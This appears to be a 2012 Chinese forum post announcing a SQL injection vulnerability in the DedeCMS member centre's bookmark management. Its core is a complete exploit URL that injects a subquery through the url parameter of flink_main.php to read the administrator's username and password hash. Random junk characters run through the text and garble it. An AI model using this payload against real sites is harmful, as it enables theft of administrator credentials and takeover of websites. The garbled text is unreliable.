DedeCMS会员中心SQL注射漏洞+ Y( J1 T+ g" j. U) J
需要magic_quotes_gpc = Off
) [( {* c' K2 S会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.$ o* z( z. ]- Y9 U
/ z% a+ v5 f6 r+ S$ ~# }DedeCMS会员中心书签管理SQL注射漏洞
: u) [. |7 c1 B0 p4 x成功利用该漏洞可获得管理员密码
( a& Q' z3 ]5 F4 X# u0 V( B2 @ R * C2 q$ `2 m- F
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
I) Z& `6 k& |0 r1 h& V % Q# D6 {( }8 X3 B6 R7 U/ k; n6 _* c
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r& J1 r% a% _3 ?
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59